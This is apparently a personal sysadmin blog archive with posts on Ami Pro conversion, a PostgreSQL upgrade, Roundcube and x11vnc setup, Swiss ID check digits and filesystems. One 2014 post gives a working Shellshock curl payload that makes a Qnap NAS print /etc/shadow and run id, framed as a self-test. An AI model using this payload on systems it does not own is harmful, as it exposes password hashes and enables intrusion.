Monday, March 21, 2022

Converting Ami Pro .SAM files to .doc or .txt

Ami Pro was by far the best word processor of it's time. That was the time of Windows 3.1, and later Windows 95. It was bought by Lotus, and instead of being developed into the word processor I wish I would have now, it eventually disappeared... 

Nowadays, there is no easy way to get to the content of these old .sam files. The files are just plain ASCII text (except when they have embedded bitmap images). But extracting the raw text from the files is not simple. For example, all accented characters are written in a strange format: "é" is written as "<\i>" in the file, "à" as "<\`>", etc.

After trying various solutions like installing Windows NT 4 into a virtual machine, or directly installing Lotus Ami Pro 3.1 into an old Windows XP VM, I came across mentions of a plugin for Microsoft Word that would allow it to read .sam files. That plugin itself was hard to find. It seems to have been included in old Microsoft converter packs which are not available anymore. This blog post from 2011 explains how to install the "Ami Pro" plugin from http://www.gmayor.com/downloads.htm but unfortunately the download is not available there anymore, saying "Sadly this old filter no longer appears to work".

Eventually, I could find it at http://www.lotusamipro.com/ where it can still be downloaded : http://www.lotusamipro.com/files/word2ami.zip

And it does work in MS Word 2003, which I had in an old Windows XP virtual machine.

So, if you have Word 2003,

  • Get that file from http://www.lotusamipro.com/files/word2ami.zip (or from here)
  • Copy "Ami332.cnv"
    to "C:\Program Files\Common Files\Microsoft Shared\TextConv\Ami332.cnv"
  • Open Word, and in the File / Open... window, under "Files of type:" select "Ami Pro 3.o (*.sam)" (or "All Files (*.*)")
    You will get this warning on which you will have to click "Yes":
    This file needs to be opened by the Ami Pro 3.0 text converter, which may pose a security risk if the file you are opening is a malicious file. Choose Yes to open this file only if you are sure it is from a trusted source.

If you have many files to convert, you can map macros to buttons in Word to make it easier. Here are 2 macros in that ancient VBS language which Word understands, to save the current file as ".doc" and as ".txt":

Sub SaveAsDOC()
' Save current document as .txt
    strDocName = ActiveDocument.Name
    strPath = ActiveDocument.Path & "\"
    intPos = InStrRev(strDocName, ".")
    strDocName = Left(strDocName, intPos - 1)
    strDocName = strPath & strDocName & ".doc"

    ActiveDocument.SaveAs _
        FileFormat:=wdFormatDocument, _
        FileName:=strDocName, _
        AddToRecentFiles:=True
End Sub

Sub SaveAsTXT()
' Save current document as .txt

    strDocName = ActiveDocument.Name
    strPath = ActiveDocument.Path & "\"
    intPos = InStrRev(strDocName, ".")
    strDocName = Left(strDocName, intPos - 1)
    strDocName = strPath & strDocName & ".txt"

    ActiveDocument.SaveAs _
        FileFormat:=wdFormatText, _
        FileName:=strDocName, _
        AddToRecentFiles:=True, _
        Encoding:=1252, _
        LineEnding:=wdCRLF
End Sub

If you are on Mac or Linux or have WSL installed in Windows, you may also want to use Bash to convert the .txt files from their Windows CP 1252 character set to UTF-8:

for f in *.txt; do recode cp1252/..utf8/ "$f"; done # using recode

Or if you don't have recode but have iconv:

for f in *.txt; do iconv -f cp1252 -t utf8 -o "$f.tmp" "$f" && mv -f "$f.tmp" "$f"; done

To set the modification time of the new files to the time of the originals, the touch command can be used in Bash :

for f in *.SAM; do touch -c -r "$f" "${f%%.SAM}.txt"; done  # date of .SAM file to .txt file
for f in *.SAM; do touch -c -r "$f" "${f%%.SAM}.doc"; done  # date of .SAM file to .doc file
# or for both .txt and .doc files a once;
for f in *.SAM; do touch -c -r "$f" "${f%%.SAM}.txt" "${f%%.SAM}.doc"; done

The Word converter does not import bitmap images embedded in the Ami Pro file. These can be extracted with te following perl script:

#!/usr/bin/env perl

## Extract bitmaps embedded in file (like in Ami Pro .SAM files)

use strict;

my $debug = 1;

my $file = shift;
die "Usage: $0 FILENAME\n" unless (-r $file);

open my $fh, '<:raw', $file;
read $fh, my $all, -s $fh;
close $fh;

my $filesize = -s $file;

my $count;
while ( $all =~ /(BM.{12})/sg ) {
    my $m = $1;
    warn "# ", join(" ", unpack("(H2)*", "$m")), "\n" if $debug;
    #https://en.wikipedia.org/wiki/BMP_file_format
    my ($bm, $size, $res1, $res2, $offset) = unpack "A2 V H4 H4 V", $m;
    if ( $offset > $size or $size > $filesize ) {
        warn "# Skipping false positive at $-[0] (size $size > file size $filesize)\n" if $debug;
        next;
    }

    warn "Found at $-[0]:\n",
          "BM     = $bm\n",
          "size   = $size\n",
          "res1   = $res1\n",
          "res2   = $res2\n",
          "offset = $offset\n" if $debug;

    $count++;
    my $bitmap = substr($all, $-[0], $size);
    print "Saving $file-$count.bmp\n";
    open my $bmfile, '>:raw', "$file-$count.bmp" or die;
    print $bmfile $bitmap;
}

Finally, an alternative which I only found afterwards is to install Lotus SmartSuite 9.8 which can be downloaded from the WinWorld site : https://winworldpc.com/product/lotus-smartsuite/9-8

That will also let you open Ami Pro files and save them in various other formats. One advantage is that when saving to Word 97 .doc files, embedded images are preserved.

Labels: , , , , , ,

Thursday, May 14, 2020

Postgresql upgrade on CentOS

Our CentOS 7.5 machine had PostgreSQL version 9.2.24. But the machine doing nightly backups had Debian 9, and PostgreSQL 9.6.10. This turned out to be a problem. pg_restore 9.2 cannot restore backups which were made by 9.6, giving this cryptic error:
pg_restore: [archiver] unsupported version (1.13) in file header
So the better long-term solution seemed to be to upgrade PostgreSQL on CentOS. The instructions in "CentOS: Upgrade PostgreSQL from 9.2 to 9.6" were very helpful. There were just a few details I needed to do differently.
yum install https://download.postgresql.org/pub/repos/yum/9.6/redhat/rhel-7-x86_64/pgdg-centos96-9.6-3.noarch.rpm
yum install postgresql96-server
This gave a list of
failed to link /usr/bin/psql -> /etc/alternatives/pgsql-psql: /usr/bin/psql exists and it is not a symlink
failed to link /usr/bin/clusterdb -> /etc/alternatives/pgsql-clusterdb: /usr/bin/clusterdb exists and it is not a symlink
...etc.
It can be fixed at the end.
systemctl stop postgresql
Hack pg_ctl
echo '#!/bin/bash' > /usr/bin/pg_ctl
echo '"$0"-orig "${@/unix_socket_directory/unix_socket_directories}"' >> /usr/bin/pg_ctl
chmod +x /usr/bin/pg_ctl

su postgres ## Exit MC first, or it hangs!
Our databases are too big to live in /var/lib/pgsql, so we have them on a separate disk mounted in /mnt/postgres
mkdir -p /mnt/postgres/9.6/data

/usr/pgsql-9.6/bin/initdb -D /mnt/postgres/9.6/data
Now, pg_upgrade may fail if the locale and or charset of the new cluster is not the same as that of the database to be upgraded.
In that case, you may have an old initdb.log in /var/lib/pgsql which would show how the original database was initialised:
Mine had this:
The database cluster will be initialized with locale “en_US.UTF-8”.
The default database encoding has accordingly been set to “UTF8”.
But my current locale had various other settings like
LC_TIME=en_DK.UTF-8
LC_COLLATE=de_CH.UTF-8
etc.
So to make pg_upgrade happy, I had to
delete /mnt/postgres/9.6/data
run initdb again with the correct locale :
LC_ALL=en_US.UTF-8 /usr/pgsql-9.6/bin/initdb -D /mnt/postgres/9.6/data
(maybe the --no-locale option would also have worked or using the correct --locale= or --lc-*= options. See man initdb)
/usr/pgsql-9.6/bin/pg_upgrade --verbose --old-datadir /mnt/postgres/data/ --new-datadir /mnt/postgres/9.6/data/ --old-bindir /usr/bin/ --new-bindir /usr/pgsql-9.6/bin/

mcedit /etc/systemd/system/postgresql-9.6.service

.include /lib/systemd/system/postgresql-9.6.service
[Service]
Environment=PGDATA=/mnt/postgres/9.6/data

systemctl daemon-reload
systemctl start postgresql-9.6
systemctl status postgresql-9.6
systemctl enable postgresql-9.6
systemctl disable postgresql.service

mv -f /usr/bin/pg_ctl{-orig,}

mkdir -p /usr/pgsql-9.2/bin/
for f in /usr/pgsql-9.6/bin/*; do b=$(basename "$f"); mv -v /usr/bin/$b /usr/pgsql-9.2/bin/ ; done

ln -si /etc/alternatives/pgsql-psql /usr/bin/psql
ln -si /etc/alternatives/pgsql-clusterdb /usr/bin/clusterdb
ln -si /etc/alternatives/pgsql-createdb /usr/bin/createdb
ln -si /etc/alternatives/pgsql-createlang /usr/bin/createlang
ln -si /etc/alternatives/pgsql-createuser /usr/bin/createuser
ln -si /etc/alternatives/pgsql-dropdb /usr/bin/dropdb
ln -si /etc/alternatives/pgsql-droplang /usr/bin/droplang
ln -si /etc/alternatives/pgsql-dropuser /usr/bin/dropuser
ln -si /etc/alternatives/pgsql-pg_basebackup /usr/bin/pg_basebackup
ln -si /etc/alternatives/pgsql-pg_dump /usr/bin/pg_dump
ln -si /etc/alternatives/pgsql-pg_dumpall /usr/bin/pg_dumpall
ln -si /etc/alternatives/pgsql-pg_restore /usr/bin/pg_restore
ln -si /etc/alternatives/pgsql-reindexdb /usr/bin/reindexdb
ln -si /etc/alternatives/pgsql-vacuumdb /usr/bin/vacuumdb

Wednesday, May 13, 2020

Mobile skin and plugin for Roundcube webmail

The "Melanie2" mobile skin and plugin seems to make Roundcube work on phones. And it is easier to install than it would seem when only briefly looking at the github instructions.

These are the commands I needed on a Debian 10 ("Buster") machine where roundcube 1.3.10 was installed. (the base install was done from the Debian repositories: apt install roundcube roundcube-sqlite3. Instead of sqlite3, it is also possible to use PostgreSQL or MySQL with the roundcube-pgsql or roundcube-mysql packages).

For the mobile stuff:

Create a directory to store the extra stuff and make upgrades easier:

mkdir -p /opt/roundcube-stuff
cd /opt/roundcube-stuff/

Get the files from Github:

git clone https://github.com/messagerie-melanie2/roundcube_skin_melanie2_larry_mobile
git clone https://github.com/messagerie-melanie2/roundcube_jquery_mobile
git clone https://github.com/messagerie-melanie2/roundcube_mobile

Instead of renaming and copying the directories, create symlinks and copy them to roundcube's skins and plugins folders:

ln -si $(pwd)/roundcube_skin_melanie2_larry_mobile/ melanie2_larry_mobile
ln -si $(pwd)/roundcube_jquery_mobile/              jquery_mobile
ln -si $(pwd)/roundcube_mobile                      mobile

cp -vd /opt/roundcube-stuff/melanie2_larry_mobile   /var/lib/roundcube/skins/
cp -vd /opt/roundcube-stuff/jquery_mobile           /var/lib/roundcube/plugins/
cp -vd /opt/roundcube-stuff/mobile                  /var/lib/roundcube/plugins/

Finally, add 'mobile' to the $config['plugins'] array in /etc/roundcube/config.inc.php. If doing it by hand is too much work, copy/pasting this should work:

echo 'array_push( $config["plugins"], "mobile" );' | tee -a /etc/roundcube/config.inc.php
#or:
## echo '$config["plugins"][] = "mobile";' | tee -a /etc/roundcube/config.inc.php

Labels: , , , , ,

Friday, October 26, 2018

VNC server for Cinnamon with systemd

This is what I did to enable a VNC server on CentOS 7.5, with the Cinnamon desktop. (The desktop is configured to automatically login at boot.)

yum install x11vnc
# or on Debian-based systems:
# apt install x11vnc

Create the file /etc/systemd/system/x11vnc.service :

[Unit]Description=VNC Server for X11
Requires=display-manager.service

[Service]
ExecStart=/usr/bin/x11vnc -display :0 -rfbauth /etc/x11vnc.pwd -shared -forever -o /var/log/x11vnc.log
ExecStop=/usr/bin/x11vnc -R stop
Restart=on-failure
RestartSec=2

Set the VNC password (replace MY_PASSWORD)

x11vnc -storepasswd MY_PASSWORD /etc/x11vnc.pwd

Finally:

systemctl daemon-reload
systemctl enable x11vnc
systemctl start x11vnc

There are many other x11vnc options that may be useful in some circumstances (see man x11vnc). For example :
-noxdamage
-loop
-ncache

Tuesday, January 02, 2018

Cartes d'identité et passeports suisses

Une rumeur circule parmi les enfants des écoles en Suisse. Elle dit que le chiffre à la fin du numéro de la carte d'identité indique le nombre de sosies. Et celà serait utile pour les caméras de surveillance et leurs logiciels de reconnaissance faciale.

C'est évidemment absurde, mais le phénomène est tout de même intéressant d'un point de vue sociologique et politique, puisqu'il reflète une perception plutôt inquiétante de nos sociétés par les enfants. Après tout, les logiciels de reconnaissance et les caméras de surveillance sont bien réels...

Cependant, la sociologie et la psychologie enfantine étant des domaines bien trop complexes pour moi, j'ai juste voulu savoir ce qu'étaient réellement ces chiffres. Sûrement des chiffres de contrôle, qui apparaissent à la fin de tous les codes qui doivent pouvoir être lus par des machines, comme le nos des comptes bancaires, des cartes de crédit, etc.

La signification des chiffres est vaguement expliquée sur le site de la Confédération pour les passeports, mais pas pour les cartes d'identité. Quand à l'agorithme utilisé pour le calcul du chiffre de contrôle, il n'est mentionné nulle part. De plus, sur l'exemple qui illustre les chiffres pour le passeport, le chiffre de contrôle est FAUX!

L'exemple indique "9" en bas à droite au lieu de "6"!

Avec une telle avarice d'explications de la part des autorités, il n'est pas étonnant de voir surgir des rumeurs bizarres.

Heureusement, pour la carte d'identité, il y a une page en allemand de Wikipedia qui explique le tout, y compris l'algorithme utilisé pour les chiffres de contrôle.

Ainsi, après mon exploration ancienne du calcul "modulo 10" pour certains chiffres de contrôle de banques et autres, j'ai pu m'amuser à faire un petit script qui donne le nombre de sosies les chiffres de contrôle pour les cartes d'identité et les passeports suisses.
L'algorithme de base en Perl est dans cette fonction "cksum":

sub cksum {
 my $num = shift;
 $num = uc( $num );       # convert tu uppercase
 $num =~ s/[^A-Z0-9<]//g; # and remove spaces etc.

 my @digits = split //, $num;
 my @multipliers = (7,3,1);
 my $cksum = 0;

 for (my $i=0; $i < @digits; $i++) {
  my $n = $digits[$i];

  $n = 0 if ($n eq "<");

  if ($n =~ /[A-Z]/) {  # A=>10, B=>11, ..., Z=>35
   $n = ord( $n ) - 55;
  }

  $cksum += $n * $multipliers[ $i % 3 ];
 }
 return $cksum % 10; # keep only last digit
}

Et pour les geeks, le script complet est ici.

Labels: , ,

Sunday, September 17, 2017

Hard drive partitions and file system essentials v2

What most normal users need to know about hard disk partitions and filesystems to be able to move hard disks between various operating systems like Mac or Windows.

Partitions

Hard disks contain 1 or more partitions. To the user, each partition appears as if it were a separate hard disk.
(In Windows, each partition receives a separate drive letter like C:, D:, etc.; on a Mac and most Linux, you see a separate icon on the desktop for each partition, and the contents is accessible in a folder like /Volumes/YourDiskName.)
The disk contains a partition table which describes the size and placement of the partitions on the disk. There are 2 main types of partition tables:

  • MBR or DOS : supported everywhere, but only for disks up to 2 TB.
  • GPT or GUID : for disks over 2 TB and for Mac OS X boot disks.

Filesystems

Every partition needs to be formatted with a file system to let the operating system store and retrieve files. (On Mac, this formatting process is called "erasing")
There are many different types of file systems. Your system needs to understand these file systems to be able to use them. Unfortunately, various operating systems use different file systems. The problem is to find which one will be understood by all the systems you intend to connect your drive to. Also, some systems only support reading some file systems, not writing to them.

Summary

Below is a table trying to summarize the compatibility between the 3 main operating systems and the 5 main file system types. There are many others, but if you know about them, you probably don't need this page.
WindowsMac OS XLinux
FAT32 or DOSNative support
Max. 4GB. file size!
Read/Write
Max. 4GB. file size!
Read/Write
Max. 4GB. file size!
NTFSNative supportRead only. Write support through additional software 1Read/Write on recent distributions.
HFS+ or "Mac OS extended"Requires third party programs for reading and writing. 2Native supportRead only. Write if forced or  journaling feature disabled. 3
ExfatNative support since Windows Vista/7Native support since 10.6.5Needs driver install
Ext2 or Ext3Requires driver 4Requires driver. 4Native support
FAT or FAT32 (named "MS-DOS" in Macs)
This the oldest of the file systems commonly used today. As such, it has the greatest compatibility and the least functionality. It is a sort of lowest common denominator. All operating systems can read and write to it. It is the file system generally used on USB flash drives, memory cards for photo cameras, etc. It cannot store files greater than 4 Gigabytes. It is also the least reliable of the current file systems, and has many other drawbacks (fragmentation, no support for permission, time stamps in local time, etc.)
The Windows disk manager refuses to format a FAT32 partition greater than 32 GB. But it can be formatted to the wanted size on Mac or Linux, or with the free fat32format utilityin Windows.
NTFS
Is the native file system of Windows. Macs can read it, but cannot write to it. However, there is a Mac version of the open source NTFS-3G driver which can write to NTFS. 1Recent Linux versions can both read it and write to it (thes usually have this NTFS-3G driver installed by default). 2
HFS aka. "Mac OS X" HFS+ aka. "Mac OS X Extended (journaled)"
Is the native file system on Macs.The Mac default is the HFS+ journaled variant. Windows needs special programs installed to be able to read or write it. 3Linux can read it when it has the hfsutils package installed. It can also write to it if journaling has been disabled. 4
Exfat
Meant to replace FAT32 on digital cameras etc. Supports files greater than 4GB, but not as feature-rich and reliable as the others.
Ext2 or Ext3
Is the official standard for DCP disks and the most common file system on Linux. You could try some Windows or Mac driver, but it's probably much easier to install Linux on some old machine and access it through the network.
UDF
And what about UDF, the "Universal Disk Format" which is even a true ISO standard? It is used on professional camera cards and on Blu-ray disks, and can in theory be read and written by all 3 current systems. But in practice, this is only true if it is correctly formatted. And since the normal formatting tools in Mac and Windows don't offer it as an option, I would only recommend it to geeks willing to use this command-line formatting script.
Footnotes:
1. Mac -> NTFS: To enable writing of NTFS on a Mac, you need a commercial program like Paragon or Tuxera.
2. Windows -> HFS: If you only need to copy files from a Mac disk to your Windows machine, you can use the free HFSExplorer, which will open your drive in a Windows Explorer-like window and let you copy files from there. For full support, you may need commercial software like MacDrive or Paragon.
3. Linux -> HFS: If you need to write to the HFS disk, journaling must be disabled on a Mac first (through Disk Utility or diskutil disableJournal "/Volumes/YOUR_VOLUME_NAME"in Terminal). Alternatively, you can force the mount point to be writable.
4. Windows/Mac -> ext2/3/4: There are various free drivers for Windows and Mac, but when I tried them a few years ago, they were probematic. There is also a commercial driver from Paragon which I haven't tried. But really, a Linux machine on the network is so much easier.

Sunday, December 20, 2015

Firefox 43 crashes. Install previous version in Ubuntu

Since Firefox was upgraded to version 43 on my Ubuntu 12.04 LTS machine, it "reliably" crashed on some pages. The easiest example being youtube.com, but many other pages also.

After trying many things which didn't work (disabling all extensions, all plugins, creating a fresh new profile), I decided to downgrade Firefox to the previous version.

But the previous version is hard to find!

The normal repository only contains version 43 for Ubuntu 12.04. The other versions in that folder cannot be installed because they depend on later versions of my libraries...

Finally, Google found me the previous version with this search:

https://www.google.com/search?q=firefox+42.0+12.04+deb

Which led me to

https://launchpad.net/~ubuntu-mozilla-security/+archive/ubuntu/ppa/+build/8220818

The rest is easy:

Remove firefox (not "purge" as is often recommended, because that may remove your profile with all your bookmarks, extensions, settings, etc.!)

sudo apt-get remove firefox

Get and install the wanted version:

cd /tmp
wget "https://launchpad.net/~ubuntu-mozilla-security/+archive/ubuntu/ppa/+build/8220818/+files/firefox_42.0%2Bbuild2-0ubuntu0.12.04.1_amd64.deb"
sudo dpkg -i firefox_42.0+build2-0ubuntu0.12.04.1_amd64.deb

Prevent future upgrades (but also prevents security upgrades!)

sudo apt-mark hold firefox

It may be time to look for a better browser than Firefox, but in the meantime, this works

 

Thursday, November 26, 2015

Roundcube webmail with SQLite on Debian

Roundcube is not available through apt-get in Debian 8 (Jessie), and the version which is in Debian 7 (Wheezy) is outdated. However, installing directly from the source is very easy.

I used SQLite, because these servers will only occasionally serve a few users for single domains. So a full database server seemed overkill. I selected /opt/roundcube as my install dir.

rcdir=/opt/roundcube
mkdir $rcdir
cd $rcdir

Check the latest version on the "Roundcube Webmail Downloads". As of November 2015, the version was 1.1.3. Copy the link for the "Complete" download.

version=1.1.3
wget https://downloads.sourceforge.net/project/roundcubemail/roundcubemail/$version/roundcubemail-$version-complete.tar.gz

Uncompress, copy out of the version-specific folder, and rename the original folder in case you need it.

tar xvf roundcubemail-$version-complete.tar.gz
rm roundcubemail-$version-complete.tar.gz
cp -rp roundcubemail-$version/* ./
mv roundcubemail-$version roundcubemail-$version.orig

Install dependencies

apt-get install php5 php-pear php5-sqlite

Initialize database

mkdir db
sqlite3 -init SQL/sqlite.initial.sql db/roundcube.sqlite

You will be left at the sqlite prompt. Type ".quit".

# sqlite3 -init SQL/sqlite.initial.sql db/roundcube.sqlite
 -- Loading resources from SQL/sqlite.initial.sql

 SQLite version 3.7.13 2012-06-11 02:05:22
 Enter ".help" for instructions
 Enter SQL statements terminated with a ";"
 sqlite> .quit

Set permissions

chown -R www-data:www-data temp logs db
chmod -R 775 db
Edit the Apache config file with your favorite editor. (I suggest mcedit or nano)
$EDITOR /etc/apache2/sites-available/webmail.conf

<VirtualHost *:80>
  ServerName webmail.example.com
  RedirectPermanent / https://webmail.example.com/
</VirtualHost>

<VirtualHost *:443>
  ServerName webmail.example.com:443

  SSLEngine on
  SSLCipherSuite HIGH:MEDIUM
  SSLProtocol all -SSLv2 -SSLv3
  SSLCACertificateFile   /etc/ssl/example.com_selfsigned_CA.pem
  SSLCertificateFile     /etc/ssl/example.com_web.pem
  SSLCertificateKeyFile  /etc/ssl/private/example.com_web.key

  ServerAdmin webmaster@alma.ch

  DocumentRoot /opt/roundcube

  CustomLog /var/log/apache2/roundcube-access.log combined3

  <Directory /opt/roundcube/>
    Options +FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from all
  </Directory>

  <Directory /opt/roundcube/config>
    Options -FollowSymLinks
    AllowOverride None
  </Directory>

  <Directory /opt/roundcube/temp>
    Options -FollowSymLinks
    AllowOverride None
    Order allow,deny
    Deny from all
  </Directory>

  <Directory /opt/roundcube/logs>
    Options -FollowSymLinks
    AllowOverride None
    Order allow,deny
    Deny from all
  </Directory>
</VirtualHost>

You may also need to add NameVirtualHost *:443 to /etc/apache2/ports.conf

Check the Apache config. and reload

a2ensite webmail
apache2ctl -S
apache2ctl graceful

Edit the Roundcube config file.

cd $rcdir/config
cp -pf config.inc.php.sample config.inc.php
$EDITOR config.inc.php

Change these:

$config['db_dsnw'] = 'sqlite:////opt/roundcube/db/roundcube.sqlite?mode=0646';
  $config['smtp_server'] = 'localhost';

And add this:

$config['mail_domain'] = '%d'; # let new users get the right domain instead of the default "user@localhost"

If needed, see also the Roundcube Wiki.

Saturday, September 27, 2014

Using curl to test Qnap NAS for Shellshock

The following briefly appeared in a Qnap forum, but was apparently quickly removed.

Since I feel it's a useful test, here it is:

Fun Shellshock test with curl

Testing your NAS for the Shellshock vulnerability with curl:

NAS_IP=192.168.1.XXX    # Use the IP or the name of your NAS

URL=http://$NAS_IP:8080/cgi-bin/index.cgi
curl -A "() { :; }; echo Content-Type: text/plain; echo; echo; cat /etc/shadow" $URL

And enjoy the output of your users and crypted passwords in a format almost ready to be fed to John The Ripper:

admin:$1$$abc...:14233:0:99999:7:::
guest:$1$$abc...:14233:0:99999:7:::
httpdusr:!:16087:0:99999:7:::
otheruser:$1$$abc...:16087:0:99999:7:::
TimeMachine:$1$$abc...:16087:0:99999:7:::
Location:/cgi-bin/login.html?20130912

(The password hashes have been redacted in this output of course)

If your NAS can be reached from the Internet, you better disconnect it now...

What this also shows is that the NAS http server appears to be running as root, since the /etc/shadow file should only be readable by root!

And indeed:

$ curl -A "() { :; }; echo Content-Type: text/plain; echo; echo; id" $URL

uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)

this shows the id of the web server process as "admin", with UID 0 and GID 0. So it's really running as root, which is certainly very helpful for NAS-hackers.

Thursday, May 15, 2014

Bootcamp adventures

I needed to replace a drive in a Mac mini with a bigger one. The drive had Mac OS X 10.9 (Mavericks) and Bootcamp with Windows 7. After using Clonezilla to backup the drive and restore it to the bigger one, the partitions were obviously still the same size. There was just a lot of free unpartitioned space at the end of the new drive.

How to resize and move all the partitions (including the hidden EFI and Recovery partitions), to fill the free space?

Disk Utility will not let you touch the Bootcamp partition. Windows 7 looked like it could resize it, but not move it. Resizing it with Win7 created a mess: the Mac would still see the original size.

The heart of the problem seems to be that the Mac wants a GPT partition table, but for Bootcamp, it creates a hybrid MBR partition which is what Win7 sees. Win7 would have no problem with a GPT-only partition, but Bootcamp makes a hybrid MBR anyway. Win7 then resizes that MBR partition, but doesn't update the GPT partition table, which is what the Mac sees. And the Mac doesn't let you fix it either.

At this point, I tried Gparted, but it wouldn't touch this mess (giving some error which I forgot).

Paragon's Camptune X looked like the best solution. However, after paying $20 for it, it turned out it couldn't do anything either. All it does is to let you move a cursor for the relative sizes of the Mac and Windows partitions. But you cannot increase the size to use the free space.

Finally, Rod Smith's Gdisk saved the day again.

What I ended up doing worked in the end:

  • Booted a Gparted USB key, and resized the Windows partition to fill the entire disk.
  • Booted to Mac, and used Camptune X to enlarge the Mac partition while reducing the Windows one.
  • Now, Windows would not boot.
  • Used gdisk to re-create the hybrid MBR, and mark the Windows partition as bootable, as explained in detail in this post.

Labels: , , , , ,